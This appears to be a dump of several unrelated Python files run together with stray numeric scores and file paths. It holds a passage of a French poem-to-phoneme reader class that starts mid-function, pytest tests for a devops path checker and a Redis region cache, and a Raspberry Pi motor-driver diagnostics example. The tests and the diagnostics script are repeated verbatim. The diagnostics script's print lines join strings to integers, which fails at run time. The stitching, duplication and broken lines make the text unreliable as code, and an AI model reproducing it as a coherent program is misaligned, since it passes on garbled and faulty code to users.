epochs=10, batch_size=64, opt=Adam()): m = x.shape[0] if self.net is None: self.net = self.model() self.net.summary() self.net.compile(optimizer=opt, loss="categorical_crossentropy", metrics=["accuracy"]) h0 = csr_matrix((m, self.n_h1)) c0 = csr_matrix((m, self.n_h1)) y_list = list(y.swapaxes(0, 1)) self.net.fit([x, c0, h0], y_list, epochs=epochs, batch_size=batch_size) return self.net def regex_lecteur(self, phrase, trad_numbers=False): if trad_numbers: reg0 = "0-9" else: reg0 = "" skip = [" ", ".", '-', self.blank] # elements a 
ne pas prendre en compte lors de l'expression reguliere trait_dunion = False for c in self.l2idx.keys(): if c == '-': trait_dunion = True if c not in skip: reg0 = "{}{}".format(reg0, c) if trait_dunion: reg0 = "{}-".format(reg0) reg = "[{}]+".format(reg0) res = RegexpTokenizer(reg).tokenize(phrase) return res def tirets_appostrophes(self, a_decouper): # appostrophes if a_decouper[0] == "'": a_decouper = a_decouper[1:] a_decouper = [splitted for splitted in a_decouper.split("'") if len(splitted) > 0] if len(a_decouper) > 1: for i in range(len(a_decouper) - 1): a_decouper[i] = "{}'".format(a_decouper[i]) # traits-d'union decoupe = list() if a_decouper[-1][-1] == '-': a_decouper[-1] = a_decouper[-1][:-1] for partie in a_decouper: partie_splitted = [par for par in partie.split("-") if len(par) > 0] if len(partie_splitted) > 1: for i in range(1, len(partie_splitted)): partie_splitted[i] = "-{}".format(partie_splitted[i]) decoupe.extend(partie_splitted) # recherche dans le vocabulaire tokens = list() # liste de tokens a retourner while len(decoupe) > 0: # decoupe est reduite a mesure que tokens se remplit p = len(decoupe) if decoupe[0][0] == '-': # si le premier caractere est un trait d'union, on l'enleve decoupe[0] = decoupe[0][1:] element = "".join(decoupe) # on forme un mot avec les elements element_know = (element in self.ortho_unique) or (element in self.ortho_multiple) while not element_know and p > 1: # le nombre d'elements diminue jusqu'a ce qu'un mot connu apparaisse p -= 1 element = "".join(decoupe[:p]) element_know = (element in self.ortho_unique) or (element in self.ortho_multiple) tokens.append(element) decoupe = decoupe[p:] # on eleve de decoupe les parties tokenisees return tokens def tokenizer(self, phrase): """ Tokeniseur maison qui sépare autour des espaces et les appostophes des mots plus courts que deux chars :param phrase :return: phrase tokenisee """ # minuscules phrase = phrase.lower() # oe et ae phrase = phrase.replace("œ", "oe") phrase = 
phrase.replace("æ", "ae") # appostrophes phrase = phrase.replace("’", "'") # regex tokens = self.regex_lecteur(phrase, trad_numbers=True) # appostrophes/traits-d'unions i = 0 while i < len(tokens): tok = tokens[i] if any(appostrophe_ou_trait in tok for appostrophe_ou_trait in ['-', "'"]) and len(tok) > 1: tokens.pop(i) tokens_to_add = self.tirets_appostrophes(tok) for token_to_add in tokens_to_add: tokens.insert(i, token_to_add) i += 1 else: i += 1 # nombres for i, tok in enumerate(tokens): if tok.isdigit(): tokens[i] = tradn(int(tok)) phrase = " ".join(tokens) tokens = self.regex_lecteur(phrase, trad_numbers=False) return tokens def tokenizer_poem(self, poem): print(self.count_lecture) self.count_lecture += 1 poem_tokens = list() for strophe in poem: strophe_tokens = list() for ver in strophe: ver_tokens = self.tokenizer(ver) strophe_tokens.append(ver_tokens) poem_tokens.append(strophe_tokens) return poem_tokens def lire_nn(self, mots): # one hot m = len(mots) n_l = len(self.l2idx) x = np.zeros((m, self.tx + 1, n_l)) for i, mot in enumerate(mots): mot = str(mot) mot = "{m}{b}".format(m=mot, b=self.blank * (self.tx + 1 - len(mot))) lettres = [self.l2idx[lettre] for lettre in mot] for j, lettre in enumerate(lettres): x[i, j, lettre] = 1 # predictions h0 = np.zeros((m, self.n_h1)) c0 = np.zeros((m, self.n_h1)) y = self.net.predict(x=[x, c0, h0]) # dictionnaire indices vers phoneme idx2p = dict() for p, idx in self.p2idx.items(): idx2p[idx] = p # conversion one hot vers mots n_p = len(self.p2idx) pron_int = np.zeros((m, n_p, self.ty + 1)) for i in range(self.ty + 1): pron_int[:, :, i] = y[i] pron_int = pron_int.argmax(axis=1) # one hot vers indices phonemes # creation dico prononciation = dict() for i, mot in enumerate(mots): prononciation_mot = "" for idx in pron_int[i, :].tolist(): prononciation_mot = "{phons}{p}".format(phons=prononciation_mot, p=idx2p[idx]).replace(self.blank, "") prononciation[mot] = prononciation_mot return prononciation def lire_mots(self, 
mots): # dicos mots_unique = set() mots_multiples = set() mots_nn = set() pos_mots = pos_tag(mots) dico_nn = 0 for mot in mots: if mot in self.ortho_unique: mots_unique.update([mot]) elif mot in self.ortho_multiple: mots_multiples.update([mot]) else: mots_nn.update([mot]) if len(mots_multiples) > 0: for m, p in pos_mots: if m in mots_multiples and (m, p) not in self.dico_multiple.keys(): mots_multiples.remove(m) mots_nn.update([m]) if len(mots_nn) > 0: dico_nn = self.lire_nn(mots_nn) prononciation = list() for i, mot in enumerate(mots): prononciation_mot = "" if mot in mots_unique: prononciation_mot = self.dico_unique[mot] elif mot in mots_multiples: prononciation_mot = self.dico_multiple[pos_mots[i]] elif mot in mots_nn: prononciation_mot = dico_nn[mot] prononciation.append(prononciation_mot) return prononciation def lire_vers(self, vers, count=False): """ Lit un vers :param vers: Chaine de caracteres du vers :param count: Si l'on souhaite compter le nombre de vers que l'on lit :return: vers lu sous la forme d'une string de phonemes non espaces """ if count: print(self.count_lecture) self.count_lecture += 1 tokens = self.tokenizer(vers) pos = pos_tag(tokens) mots_lus = self.lire_mots(tokens) mots_lus_avec_e = e_final_tokens(tokens, mots_lus, pos, vers) mots_lus_liaisons = liaisons_tokens(tokens, mots_lus_avec_e, pos, vers) vers_lu = "".join(mots_lus_liaisons) return vers_lu def lire_strophe(self, strophe, ponctuation=None): if ponctuation is None: ponctuation = ['.', ',', '!', '?', "…"] # separation en phrases text_strophe = " ".join(strophe) reg0 = "".join(ponctuation) reg0 = "(?:(?![{caracteres_a_eviter}]).)+".format(caracteres_a_eviter=reg0) phrases_strophe = [phrase for phrase in RegexpTokenizer(reg0).tokenize(text_strophe) if len(phrase) > 0] # lecture des phrases phrases_lues = list() pos_phrases = list() for phrase in phrases_strophe: tokens_phrase = self.tokenizer(phrase) phrases_lues.extend(self.lire_mots(tokens_phrase)) 
pos_phrases.extend(pos_tag(tokens_phrase)) return phrases_lues, pos_phrases def lire_poem(self, poem_tokens, poem_text): print(self.count_lecture) self.count_lecture += 1 poem_phonemes_tokens = list() assert len(poem_tokens) == len(poem_text), "Les listes de textes et des tokens ont des longueurs differentes" for idx_s, strophe in enumerate(poem_tokens): strophe_text = poem_text[idx_s] strophe_phonemes_tokens = list() pos_strophe = list() phrase_a_lire = list() for ver_tokens in strophe: n_tok_ver = len(ver_tokens) phrase_a_lire.extend(ver_tokens) strophe_phonemes_tokens.append(n_tok_ver * ['']) pos_strophe.append(n_tok_ver * ['']) phrase_lue = self.lire_mots(phrase_a_lire) pos_phrase = pos_tag(phrase_a_lire) i = 0 j = 0 for idx, phoneme_mot in enumerate(phrase_lue): while len(strophe_phonemes_tokens[j]) == 0: strophe_phonemes_tokens[j] = "" pos_strophe[j] = [] i = 0 j += 1 strophe_phonemes_tokens[j][i] = phoneme_mot pos_strophe[j][i] = pos_phrase[idx] i += 1 if i == len(strophe_phonemes_tokens[j]): i = 0 j += 1 for idx in range(len(strophe_phonemes_tokens)): if len(strophe_phonemes_tokens[idx]) > 1: strophe_phonemes_tokens[idx] = e_final_tokens(strophe[idx], strophe_phonemes_tokens[idx], pos_strophe[idx], strophe_text[idx]) strophe_phonemes_tokens[idx] = liaisons_tokens(strophe[idx], strophe_phonemes_tokens[idx], pos_strophe[idx], strophe_text[idx]) strophe_phonemes_tokens[idx] = "".join(strophe_phonemes_tokens[idx]) if strophe_phonemes_tokens == [[]]: strophe_phonemes_tokens = [''] poem_phonemes_tokens.append(strophe_phonemes_tokens) return poem_phonemes_tokens def evaluate_model_from_lists(self, liste, batch_size=256): """ Mesure la performance d'un modele sur une liste de donnees :param liste: donnees sous forme de liste sur lesquelles evaluer le modele :param batch_size: taille du batch pour calculer les performances """ x, y_inv = self.one_hot_from_list(liste) y = list(y_inv.swapaxes(0, 1)) h0 = csr_matrix((x.shape[0], self.n_h1)) c0 = csr_matrix((x.shape[0], 
self.n_h1)) results = self.net.evaluate([x, c0, h0], y, batch_size=batch_size) print('loss:', results[0]) for i in range(0, self.ty): print('acc char {}:'.format(i), results[i + self.ty + 2]) def mispredicted(self, t_l, batch_size=256): unique_couples = list(set(t_l)) # recuperation des elements uniques missed = list() # liste des éléments mal predits x, y = self.one_hot_from_list(data=unique_couples) m = x.shape[0] y_a = y.argmax(axis=2) print(y_a.shape) c0 = csr_matrix((m, self.n_h1)) h0 = csr_matrix((m, self.n_h1)) y_hat_list = self.net.predict(x=[x, c0, h0], batch_size=batch_size) pred_phon = list() # dictionnaire indice vers phoneme idx2p = dict() for p, idx in self.p2idx.items(): idx2p[idx] = p for i in range(self.ty + 1): mat_yi_hat = y_hat_list[i].argmax(axis=1).reshape((m, 1)) pred_phon.append(mat_yi_hat) y_hat_a = np.concatenate(pred_phon, axis=1) # tranformation des mauvaises predictions en mots for i in range(m): bonne_prediction = pd.Series(y_hat_a[i, :] == y_a[i, :]).all() if not bonne_prediction: vecteur_predit = y_hat_a[i, :].tolist() prononciation_predite = "".join([idx2p[idx] for idx in vecteur_predit]).replace(self.blank, "") missed.append([unique_couples[i][0], unique_couples[i][1], prononciation_predite]) return missed def save(self, path): self.net.save(path) if __name__ == "lecture": os.environ['JAVAHOME'] = r"C:\Program Files (x86)\Java\jre1.8.0_261\bin\java.exe"
0.569613
0.448185
import logging import pathlib import tempfile import pytest from foodx_devops_tools.pipeline_config import PipelineConfiguration from foodx_devops_tools.pipeline_config._checks import ( _file_exists, do_path_check, ) from tests.ci.support.pipeline_config import MOCK_PATHS, MOCK_SECRET log = logging.getLogger(__name__) @pytest.fixture() def mock_file_exists(mock_async_method, mock_verify_puff_target): def _apply(return_value=None, side_effect=None): mock_async_method( "foodx_devops_tools.pipeline_config._checks._file_exists", return_value=return_value, side_effect=side_effect, ) return _apply @pytest.fixture() def path_check_mocks( mock_apply_template, mock_loads, mock_results, mock_run_puff_check, mock_file_exists, ): def _apply(return_value=None, side_effect=None): mock_file_exists(return_value=return_value, side_effect=side_effect) mock_loads(mock_results) mock_config = PipelineConfiguration.from_files(MOCK_PATHS, MOCK_SECRET) return mock_config return _apply class TestFileExists: @pytest.mark.asyncio async def test_true(self): with tempfile.TemporaryDirectory() as dir: this_dir = pathlib.Path(dir) this_file = this_dir / "exists" with this_file.open(mode="w") as f: f.write("") assert await _file_exists(this_file) @pytest.mark.asyncio async def test_false(self): with tempfile.TemporaryDirectory() as dir: this_dir = pathlib.Path(dir) this_file = this_dir / "notexists" assert not this_file.is_file() assert not await _file_exists(this_file) class TestDoPathCheck: @pytest.mark.asyncio async def test_clean(self, path_check_mocks): mock_config = path_check_mocks(return_value=True) await do_path_check(mock_config) @pytest.mark.asyncio async def test_missing_file(self, path_check_mocks): mock_config = path_check_mocks( side_effect=[True, False, True, True, True] ) with pytest.raises( FileNotFoundError, match=r"files missing from deployment" ): await do_path_check(mock_config) @pytest.mark.asyncio async def test_multiple_missing_files(self, path_check_mocks): mock_config = 
path_check_mocks( side_effect=[False, False, False, False, False] ) with pytest.raises( FileNotFoundError, match=r"files missing from deployment" ): await do_path_check(mock_config) @pytest.mark.asyncio async def test_failed_check( self, path_check_mocks, mocker, ): mocker.patch( "foodx_devops_tools.pipeline_config._checks._check_arm_files", side_effect=RuntimeError(), ) mock_config = path_check_mocks(return_value=True) with pytest.raises(RuntimeError): await do_path_check(mock_config)
tests/ci/unit_tests/pipeline_config/test_checks.py
import logging import pathlib import tempfile import pytest from foodx_devops_tools.pipeline_config import PipelineConfiguration from foodx_devops_tools.pipeline_config._checks import ( _file_exists, do_path_check, ) from tests.ci.support.pipeline_config import MOCK_PATHS, MOCK_SECRET log = logging.getLogger(__name__) @pytest.fixture() def mock_file_exists(mock_async_method, mock_verify_puff_target): def _apply(return_value=None, side_effect=None): mock_async_method( "foodx_devops_tools.pipeline_config._checks._file_exists", return_value=return_value, side_effect=side_effect, ) return _apply @pytest.fixture() def path_check_mocks( mock_apply_template, mock_loads, mock_results, mock_run_puff_check, mock_file_exists, ): def _apply(return_value=None, side_effect=None): mock_file_exists(return_value=return_value, side_effect=side_effect) mock_loads(mock_results) mock_config = PipelineConfiguration.from_files(MOCK_PATHS, MOCK_SECRET) return mock_config return _apply class TestFileExists: @pytest.mark.asyncio async def test_true(self): with tempfile.TemporaryDirectory() as dir: this_dir = pathlib.Path(dir) this_file = this_dir / "exists" with this_file.open(mode="w") as f: f.write("") assert await _file_exists(this_file) @pytest.mark.asyncio async def test_false(self): with tempfile.TemporaryDirectory() as dir: this_dir = pathlib.Path(dir) this_file = this_dir / "notexists" assert not this_file.is_file() assert not await _file_exists(this_file) class TestDoPathCheck: @pytest.mark.asyncio async def test_clean(self, path_check_mocks): mock_config = path_check_mocks(return_value=True) await do_path_check(mock_config) @pytest.mark.asyncio async def test_missing_file(self, path_check_mocks): mock_config = path_check_mocks( side_effect=[True, False, True, True, True] ) with pytest.raises( FileNotFoundError, match=r"files missing from deployment" ): await do_path_check(mock_config) @pytest.mark.asyncio async def test_multiple_missing_files(self, path_check_mocks): mock_config = 
path_check_mocks( side_effect=[False, False, False, False, False] ) with pytest.raises( FileNotFoundError, match=r"files missing from deployment" ): await do_path_check(mock_config) @pytest.mark.asyncio async def test_failed_check( self, path_check_mocks, mocker, ): mocker.patch( "foodx_devops_tools.pipeline_config._checks._check_arm_files", side_effect=RuntimeError(), ) mock_config = path_check_mocks(return_value=True) with pytest.raises(RuntimeError): await do_path_check(mock_config)
0.472197
0.241311
import multi_half_bridge_py as mhb from time import sleep # Tle94112 Object on Shield 1 controller = mhb.Tle94112Rpi() # Tle94112motor Objects on controller motor = mhb.Tle94112Motor(controller) # Enable motorController on all Shields and motors # Note: Required to be done before starting to configure the motor # controller is set to default CS0 pin controller.begin() # Connect a motor to HB1 high-side and HB5 low-side # With two combined half bridges the motor can have up to 1.8 A motor.initConnector(motor.HIGHSIDE, controller.TLE_NOPWM, controller.TLE_HB1, controller.TLE_NOHB, controller.TLE_NOHB, controller.TLE_NOHB) motor.initConnector(motor.LOWSIDE, controller.TLE_NOPWM, controller.TLE_HB5, controller.TLE_NOHB, controller.TLE_NOHB, controller.TLE_NOHB) # Start the motor controller motor.begin() # Run the motor motor.start(255) # Clear all errors to start clean controller.clearErrors() print("Motor active, starting loop.\n") while 1: # Communicate with TLE94112 to get the status register SYS_DIAG1 (default) status = controller.getSysDiagnosis() # The SPI error flag shows if a SPI protocol # error is detected. if (status & controller.TLE_SPI_ERROR): print("SPI error detected!") # Handle errors '''The under voltage flag shows if a supply voltage below the lower limit is detected. All outputs are disabled when flag is set. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_UNDER_VOLTAGE): print("Under voltage detected!") # Handle the under voltage error here. ''' The over voltage flag shows if a supply voltage above the upper limit is detected. All outputs are disabled when flag is set. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_OVER_VOLTAGE): print("Over voltage detected!") # Handle the over voltage error here. ''' The over voltage flag shows if a supply voltage above the upper limit is detected. All outputs are disabled when flag is set. 
This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_POWER_ON_RESET): print("Power on reset detected!") # Handle the power on reset here. ''' The pre-warning temperature flag shows that the junction temperature exceeded the temperature pre-warning threshold. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_TEMP_WARNING): print("Junction temperature above pre-warning threshold!") # Handle the temperature warning here. ''' The shutdown temperature flag shows that the junction temperature exceeded the shutdown temperature threshold. All outputs are disabled when flag is set. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_TEMP_SHUTDOWN): print("Junction temperature above shutdown threshold!") # Handle the temperature shutdown here. ''' The load error flag shows that either: - an open load error or - an over-current error is detected on at least one output. The faulty output is disabled in case of an over-current error. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_LOAD_ERROR): print("Load error detected!") # Handle the Load error here. ''' A load error can be specified more precisely. The chip knows which kind of error occurred in which half-bridge. 
This can be red as follows: ''' # For each half bridge (0 is placeholder for no half bridge) for halfBridge in range(1,13): if (halfBridge==1): hb_val = controller.TLE_HB1 if (halfBridge==2): hb_val = controller.TLE_HB2 if (halfBridge==3): hb_val = controller.TLE_HB3 if (halfBridge==4): hb_val = controller.TLE_HB4 if (halfBridge==5): hb_val = controller.TLE_HB5 if (halfBridge==6): hb_val = controller.TLE_HB6 if (halfBridge==7): hb_val = controller.TLE_HB7 if (halfBridge==8): hb_val = controller.TLE_HB8 if (halfBridge==9): hb_val = controller.TLE_HB9 if (halfBridge==10): hb_val = controller.TLE_HB10 if (halfBridge==11): hb_val = controller.TLE_HB11 if (halfBridge==12): hb_val = controller.TLE_HB12 # Read over-current status of this half bridge from chip oc = controller.getHBOverCurrent(hb_val) # Check for an over-current error on the low-side of this half bridge if (oc & controller.TLE_LOWSIDE): print("\tHB" + hb_val + "\tOver-current detected in low-side switch." + halfBridge) # Check for an over-current error on the high-side of this half bridge if (oc & controller.TLE_HIGHSIDE): print("\tHB" + hb_val + "\tOver-current detected in high-side switch." + halfBridge) # Read open load status of this half bridge from chip ol = controller.getHBOpenLoad(hb_val) # Check for an open load error in this half bridge if (ol): print("\tHB" + hb_val + "\tOpen load detected." + halfBridge) # If no error was found print a heartbeat message if (status==0): print("All seems fine :-)") print("\n---\n") # Clear all error flags (will clear latched errors if they do not persist) controller.clearErrors() # Wait for 5 seconds sleep(5)
src/framework/raspberrypi/examples_py/errorDiagnosis.py
import multi_half_bridge_py as mhb from time import sleep # Tle94112 Object on Shield 1 controller = mhb.Tle94112Rpi() # Tle94112motor Objects on controller motor = mhb.Tle94112Motor(controller) # Enable motorController on all Shields and motors # Note: Required to be done before starting to configure the motor # controller is set to default CS0 pin controller.begin() # Connect a motor to HB1 high-side and HB5 low-side # With two combined half bridges the motor can have up to 1.8 A motor.initConnector(motor.HIGHSIDE, controller.TLE_NOPWM, controller.TLE_HB1, controller.TLE_NOHB, controller.TLE_NOHB, controller.TLE_NOHB) motor.initConnector(motor.LOWSIDE, controller.TLE_NOPWM, controller.TLE_HB5, controller.TLE_NOHB, controller.TLE_NOHB, controller.TLE_NOHB) # Start the motor controller motor.begin() # Run the motor motor.start(255) # Clear all errors to start clean controller.clearErrors() print("Motor active, starting loop.\n") while 1: # Communicate with TLE94112 to get the status register SYS_DIAG1 (default) status = controller.getSysDiagnosis() # The SPI error flag shows if a SPI protocol # error is detected. if (status & controller.TLE_SPI_ERROR): print("SPI error detected!") # Handle errors '''The under voltage flag shows if a supply voltage below the lower limit is detected. All outputs are disabled when flag is set. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_UNDER_VOLTAGE): print("Under voltage detected!") # Handle the under voltage error here. ''' The over voltage flag shows if a supply voltage above the upper limit is detected. All outputs are disabled when flag is set. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_OVER_VOLTAGE): print("Over voltage detected!") # Handle the over voltage error here. ''' The over voltage flag shows if a supply voltage above the upper limit is detected. All outputs are disabled when flag is set. 
This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_POWER_ON_RESET): print("Power on reset detected!") # Handle the power on reset here. ''' The pre-warning temperature flag shows that the junction temperature exceeded the temperature pre-warning threshold. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_TEMP_WARNING): print("Junction temperature above pre-warning threshold!") # Handle the temperature warning here. ''' The shutdown temperature flag shows that the junction temperature exceeded the shutdown temperature threshold. All outputs are disabled when flag is set. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_TEMP_SHUTDOWN): print("Junction temperature above shutdown threshold!") # Handle the temperature shutdown here. ''' The load error flag shows that either: - an open load error or - an over-current error is detected on at least one output. The faulty output is disabled in case of an over-current error. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_LOAD_ERROR): print("Load error detected!") # Handle the Load error here. ''' A load error can be specified more precisely. The chip knows which kind of error occurred in which half-bridge. 
This can be red as follows: ''' # For each half bridge (0 is placeholder for no half bridge) for halfBridge in range(1,13): if (halfBridge==1): hb_val = controller.TLE_HB1 if (halfBridge==2): hb_val = controller.TLE_HB2 if (halfBridge==3): hb_val = controller.TLE_HB3 if (halfBridge==4): hb_val = controller.TLE_HB4 if (halfBridge==5): hb_val = controller.TLE_HB5 if (halfBridge==6): hb_val = controller.TLE_HB6 if (halfBridge==7): hb_val = controller.TLE_HB7 if (halfBridge==8): hb_val = controller.TLE_HB8 if (halfBridge==9): hb_val = controller.TLE_HB9 if (halfBridge==10): hb_val = controller.TLE_HB10 if (halfBridge==11): hb_val = controller.TLE_HB11 if (halfBridge==12): hb_val = controller.TLE_HB12 # Read over-current status of this half bridge from chip oc = controller.getHBOverCurrent(hb_val) # Check for an over-current error on the low-side of this half bridge if (oc & controller.TLE_LOWSIDE): print("\tHB" + hb_val + "\tOver-current detected in low-side switch." + halfBridge) # Check for an over-current error on the high-side of this half bridge if (oc & controller.TLE_HIGHSIDE): print("\tHB" + hb_val + "\tOver-current detected in high-side switch." + halfBridge) # Read open load status of this half bridge from chip ol = controller.getHBOpenLoad(hb_val) # Check for an open load error in this half bridge if (ol): print("\tHB" + hb_val + "\tOpen load detected." + halfBridge) # If no error was found print a heartbeat message if (status==0): print("All seems fine :-)") print("\n---\n") # Clear all error flags (will clear latched errors if they do not persist) controller.clearErrors() # Wait for 5 seconds sleep(5)
0.45423
0.336808
import pytest from collections import namedtuple from region_cache import RegionCache @pytest.fixture(params=[ {'REGION_CACHE_URL': 'redis://localhost:6379/5'}, { 'REGION_CACHE_URL': 'redis://localhost:6379/5', 'REGION_CACHE_RR_URL': 'redis://localhost:6379/5' }, { 'REGION_CACHE_HOST': 'localhost', 'REGION_CACHE_PORT': 6379, 'REGION_CACHE_DB': 5, 'REGION_CACHE_RR_HOST': 'localhost', 'REGION_CACHE_RR_PORT': 6379 }, { 'REGION_CACHE_HOST': 'localhost', 'REGION_CACHE_PORT': 6379, 'REGION_CACHE_DB': 5, 'REGION_CACHE_OP_TIMEOUT': 0.5 }, { 'REGION_CACHE_HOST': 'localhost', 'REGION_CACHE_PORT': 6379, 'REGION_CACHE_DB': 5, 'REGION_CACHE_OP_TIMEOUT': 0.5, 'REGION_CACHE_OP_TIMEOUT_RAISE': False, 'REGION_CACHE_OP_TIMEOUT_RECONNECT': True, 'REGION_CACHE_REDIS_OPTIONS': { 'max_connections': 3 } } ]) def app(request): return namedtuple('app', ['config'])(config=request.param) @pytest.fixture() def region_cache(app): c = RegionCache() c.init_app(app) c.conn.flushall() yield c c.conn.flushall() @pytest.fixture() def region(region_cache): r = region_cache.region('example_region') yield r r.invalidate() @pytest.fixture() def region_with_timeout(region_cache): r = region_cache.region('timed_region', timeout=2) yield r r.invalidate() def test_init_app(app): c = RegionCache() c.init_app(app) assert c.conn assert c.conn.ping() assert c._root assert c._root_name in c._regions assert c._regions[c._root_name] is c._root assert len(c._regions) == 1 def test_subregions(region_cache): r = region_cache.region('abc.xyz') assert '{region_cache._root_name}.abc'.format(region_cache=region_cache) in region_cache._regions assert '{region_cache._root_name}.abc.xyz'.format(region_cache=region_cache) in region_cache._regions assert 'abc.xyz' not in region_cache._regions assert 'xyz' not in region_cache._regions r1 = region_cache.region('xml', timeout=60) assert r1._timeout == 60 r2 = r1.region('json') assert r2._timeout == 60 def test_region_context_manager(region): with region as r: r['key1'] = 0 
r['key2'] = 1 assert 'key1' in region assert 'key2' in region assert region._region_cache.conn.hget(region.name, 'key1') is not None assert region._region_cache.conn.hget(region.name, 'key2') is not None def test_invalidate(region): region['key'] = 'value' region.invalidate() assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None sb = region.region('sub') sb['key2'] = 'value' region.invalidate() assert region._region_cache.conn.hget(sb.name, 'key2') is None assert 'key2' not in sb def test_invalidate_region(region_cache, region): region['key'] = 'value' region_cache.region('root').invalidate() assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None sb = region.region('sub') sb['key2'] = 'value' region.invalidate() assert region._region_cache.conn.hget(sb.name, 'key2') is None assert 'key2' not in sb def test_items(region): region['foo'] = 'bar' assert region['foo'] == 'bar' assert region._region_cache.conn.hget(region.name, 'foo') is not None del region['foo'] assert pytest.raises(KeyError, lambda: region['foo']) def test_children(region): sb = region.region('sub') assert sb in list(region.children()) def test_iter(region, region_cache): region['foo'] = 'bar' assert [x for x in region] region.invalidate() def test_invalidate_on(region): import blinker s = blinker.signal('named_signal') t = blinker.signal('other_signal') region['key'] = 'value' region.invalidate_on(s, t) s.send('nothing',in_='particular') assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None region['key'] = 'value' t.send('nothing', in_='particular') assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None def test_cached(region): called = [0] @region.cached def foobar(k, x=None): called[0] += 1 return k foobar(1) assert called[0] == 1 foobar(1) assert called[0] == 1 def test_get_or_compute(region): x = region.get_or_compute('computed_key', 0) assert 
'computed_key' in region assert region['computed_key'] == 0 assert x == 0 y = region.get_or_compute('computed_key2', lambda: 200) assert y == 200 assert 'computed_key2' in region assert region['computed_key2'] == 200 def test_invalidate_connections(region_cache): region_cache.invalidate_connections() assert region_cache._w_conn is None assert region_cache._r_conn is None def test_reconnect_backoff(region, region_cache): region['key1'] = 0 region['key2'] = 1 region_cache._reconnect_backoff = 5 # 5 second backoff before trying to reconnect region_cache.invalidate_connections() assert region_cache.is_disconnected() with pytest.raises(KeyError): region['key1'] assert region_cache._w_conn is None assert region_cache._r_conn is None def test_timeout_with_context(region_with_timeout): with region_with_timeout as r: r['key1'] = 0 r['key2'] = 1 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout import time time.sleep(1) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout time.sleep(1.5) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) == -2 assert 'key1' not in region_with_timeout assert 'key2' not in region_with_timeout def test_timeout(region_with_timeout): region_with_timeout['key1'] = 0 region_with_timeout['key2'] = 1 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert 
region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout import time time.sleep(1) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout time.sleep(1.5) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) == -2 assert 'key1' not in region_with_timeout assert 'key2' not in region_with_timeout # make sure we can recreate the region. region_with_timeout['key1'] = 0 region_with_timeout['key2'] = 1 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout subregion = region_with_timeout.region("subregion") subregion['key1'] = 0 subregion['key2'] = 1 assert subregion._region_cache.conn.hget(subregion.name, 'key1') is not None assert subregion._region_cache.conn.hget(subregion.name, 'key2') is not None assert subregion._region_cache.conn.ttl(subregion.name) > 0 assert 'key1' in subregion assert 'key2' in subregion import time time.sleep(1) assert subregion._region_cache.conn.ttl(subregion.name) > 0 assert subregion._region_cache.conn.hget(subregion.name, 'key1') is not None assert subregion._region_cache.conn.hget(subregion.name, 'key2') is not None assert 'key1' in subregion assert 'key2' in subregion time.sleep(1.5) assert subregion._region_cache.conn.ttl(subregion.name) == -2 assert 'key1' 
not in subregion assert 'key2' not in subregion # make sure we can recreate the region. subregion['key1'] = 0 subregion['key2'] = 1 assert subregion._region_cache.conn.hget(subregion.name, 'key1') is not None assert subregion._region_cache.conn.hget(subregion.name, 'key2') is not None assert subregion._region_cache.conn.ttl(subregion.name) > 0 assert 'key1' in subregion assert 'key2' in subregion
tests/test_region_cache.py
